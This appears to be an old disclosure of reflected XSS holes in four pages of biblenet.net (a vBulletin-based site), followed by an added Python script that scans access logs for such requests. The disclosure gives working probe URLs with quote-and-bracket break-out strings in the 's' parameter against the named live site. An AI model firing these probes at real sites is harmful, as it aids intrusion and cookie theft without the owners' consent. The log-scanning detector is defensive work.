Biblenet.net - XSS


Biblenet.net

Homepage:
http://www.biblenet.net

Affected files:
gettinginvolved.html
register.php
member.php
/library/index.html
-----------------------------------------

Biblespace uses vBulletin for most of their site, so most of these vulns are based in vBulletin itself, which others have probably found before.

XSS vuln with cookie disclosure via gettingInvolved.html:

http://www.biblenet.net/gettingInvolved.html?s=">">">">">"><"<"<"<"

XSS vuln with cookie disclosure via register.php:
http://www.biblenet.net/forums/register.php?s=\\">">">">">"><"<"<"<"&action=signup


XSS vuln with cookie disclosure via member.php when editing profile, this time after we've logged in:

http://www.biblenet.net/forums/member.php?action=editprofile&s=">">">">'>'>'><"<"<"<'<'

Same XSS vuln as above, this time on /library/index.html:
http://www.biblenet.net/library/index.html?s=questions">">">">">"><"<"<"<"

Screenshots:
http://www.youfucktard.com/xsp/biblespace1.jpg
http://www.youfucktard.com/xsp/biblespace2.jpg
http://www.youfucktard.com/xsp/biblespace3.jpg
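
A defender-side check for the pattern reported above, as an added example that is not part of the original advisory: it scans web-server access logs for requests to the four affected paths whose `s` parameter decodes to HTML metacharacters. The combined log format, the function name and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Paths and parameter name come from the advisory; compared case-insensitively
# because the advisory spells one file two ways.
AFFECTED_PATHS = {
    "/gettinginvolved.html",
    "/forums/register.php",
    "/forums/member.php",
    "/library/index.html",
}
PARAM = "s"
# Characters that let a reflected value break out of an attribute or tag.
HTML_META = re.compile(r"[<>\"']")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines with a harmless marker payload, not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2006:10:00:00 +0000] "GET /forums/register.php'
    '?s=0123456789abcdef0123456789abcdef&action=signup HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2006:10:00:05 +0000] "GET /gettingInvolved.html'
    '?s=%22%3E%3Cb%3Etest HTTP/1.1" 200 4096',
    '198.51.100.7 - - [01/Jan/2006:10:00:09 +0000] "GET /library/index.html'
    '?s=questions%2522%253E HTTP/1.1" 200 4096',
    '192.0.2.10 - - [01/Jan/2006:10:00:12 +0000] "GET /index.html'
    '?s=%3Cb%3E HTTP/1.1" 200 100',
]


def suspicious_requests(log_lines):
    """Return (line_number, path, decoded_value) for each flagged request."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if url.path.lower() not in AFFECTED_PATHS:
            continue
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            # parse_qsl decodes once; a second pass catches double encoding.
            value = unquote(value)
            if key == PARAM and HTML_META.search(value):
                hits.append((number, url.path, value))
    return hits
```

Calling `suspicious_requests(SAMPLE_LOG)` flags the second and third sample lines, the latter only because of the second decoding pass.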
